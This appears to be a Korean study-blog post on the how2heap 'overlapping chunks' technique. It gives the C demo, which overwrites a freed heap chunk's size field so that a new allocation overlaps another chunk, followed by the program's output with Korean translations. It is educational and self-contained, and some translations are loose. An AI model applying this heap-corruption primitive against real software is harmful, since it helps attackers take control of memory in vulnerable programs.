/* A simple tale of overlapping chunk. This technique is taken from http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf */ #include "stdio.h" #include "stdlib.h" #include "string.h" #include "stdint.h" int main(int argc , char* argv[]){ intptr_t *p1,*p2,*p3,*p4; printf("\nThis is a simple chunks overlapping problem\n\n"); printf("Let's start to allocate 3 chunks on the heap\n"); p1 = malloc(0x100 - 8); p2 = malloc(0x100 - 8); p3 = malloc(0x80 - 8); printf("The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3); memset(p1, '1', 0x100 - 8); memset(p2, '2', 0x100 - 8); memset(p3, '3', 0x80 - 8); printf("\nNow let's free the chunk p2\n"); free(p2); printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n"); printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n"); printf("For a toy program, the value of the last 3 bits is unimportant;" " however, it is best to maintain the stability of the heap.\n"); printf("To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse)," " to assure that p1 is not mistaken for a free chunk.\n"); int evil_chunk_size = 0x181; int evil_region_size = 0x180 - 8; printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n", evil_chunk_size, evil_region_size); *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2 printf("\nNow let's allocate another chunk with a size equal to the data\n" "size of the chunk p2 injected size\n"); printf("This malloc will be served from the previously freed chunk that\n" "is parked in the unsorted bin which size has been modified by us\n"); p4 = malloc(evil_region_size); printf("\np4 has been allocated at %p and ends at %p\n", p4, p4+evil_region_size); printf("p3 starts at %p and ends at %p\n", p3, p3+80); printf("p4 should overlap with p3, in this case p4 includes all p3.\n"); printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3," " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n"); printf("Let's run through an example. Right now, we have:\n"); printf("p4 = %s\n", (char *)p4); printf("p3 = %s\n", (char *)p3); printf("\nIf we memset(p4, '4', %d), we have:\n", evil_region_size); memset(p4, '4', evil_region_size); printf("p4 = %s\n", (char *)p4); printf("p3 = %s\n", (char *)p3); printf("\nAnd if we then memset(p3, '3', 80), we have:\n"); memset(p3, '3', 80); printf("p4 = %s\n", (char *)p4); printf("p3 = %s\n", (char *)p3); }
This is a simple chunks overlapping problem
intptr_t *p1,*p2,*p3,*p4;
Let's start to allocate 3 chunks on the heap
heap에 3개의 chunk를 할당합시다.
The 3 chunks have been allocated here:
p1=0x9e6420
p2=0x9e6520
p3=0x9e6620
p1 = malloc(0x100 - 8); p2 = malloc(0x100 - 8); p3 = malloc(0x80 - 8);
memset(p1, '1', 0x100 - 8); memset(p2, '2', 0x100 - 8); memset(p3, '3', 0x80 - 8);
Now let's free the chunk p2
free(p2);
The chunk p2 is now in the unsorted bin ready to serve possible
p2청크는 이제 unsorted bin에 있다.
new malloc() of its size
이 사이즈로 새로 malloc을 하자
Now let's simulate an overflow that can overwrite the size of the
chunk freed p2.
이제 freed된 p2의 size를 overwrite하는 overflow를 simulate하자
For a toy program, the value of the last 3 bits is unimportant; however, it is best to maintain the stability of the heap.
마지막 3bit는 heap의 안전성을 유지하기 위해 중요하다.
To achieve this stability we will mark the least signifigant bit as 1 (prev_inuse), to assure that p1 is not mistaken for a free chunk.
안전성을 달성하기위해 우리는 이 중요한 prev_inuse 비트를 1로 설정한다. p1이 free chunk로 오인되지 않게 하기위해서
int evil_chunk_size = 0x181; int evil_region_size = 0x180 - 8;
We are going to set the size of chunk p2 to to 385, which gives us
a region size of 376
우리는 p2의 사이즈를 385로 설정한다. regionsize 는 376
*(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2
Now let's allocate another chunk with a size equal to the data
size of the chunk p2 injected size
이제 또다른 청크를 할당하자 size를 p2의 inject한 사이즈와 같게해서 말이다.
This malloc will be served from the previously freed chunk that
is parked in the unsorted bin which size has been modified by us
이 malloc은 이전 freed chunk로 부터 제공될 것이다. 이것은 우리가 수정한 사이즈의 unsorted bin에 있다.
p4 = malloc(evil_region_size);
p4 has been allocated at 0x9e6520 and ends at 0x9e70e0
p4는 0x9e6520에 할당되어 0x9e70e0에서 끝난다.
p3 starts at 0x9e6620 and ends at 0x9e68a0
p3은 0x9e6620 에서 시작되서 0x9e68a0에서 끝난다.
p4 should overlap with p3, in this case p4 includes all p3.
p4는 p3과 겹친다. 이 경우 p4는 p3을 포함한다.
Now everything copied inside chunk p4 can overwrites data on
chunk p3, and data written to chunk p3 can overwrite data
stored in the p4 chunk.
이제 p4안에 복사하는 모든것은 p3에 overwrite될 것이다. 그리고 p3청크에 쓰여진 데이타는 p4청크에 복사될 것이다.
Let's run through an example. Right now, we have:
p4 = Xt��
p3 = 333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333q
memset(p4, '4', evil_region_size);
If we memset(p4, '4', 376), we have:
p4 = 4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444q
p3 = 444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444q
memset(p3, '3', 80);
And if we then memset(p3, '3', 80), we have:
p4 = 4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444333333333333333333333333333333333333333333333333333333333333333333333333333333334444444444444444444444444444444444444444q
p3 = 333333333333333333333333333333333333333333333333333333333333333333333333333333334444444444444444444444444444444444444444q
'시스템 > how2heap시리즈' 카테고리의 다른 글
how2heap 시리즈 내맘대로 번역+요약 (4) | 2017.02.04 |
---|---|
++heap exploit house of prime,mind (0) | 2017.02.04 |
[how2heap]malloc_playground (0) | 2017.01.24 |
[how2heap정리]poison_null_byte (0) | 2017.01.20 |
[how2heap정리] house_of_lore - 이해안감 ㅠ (0) | 2017.01.17 |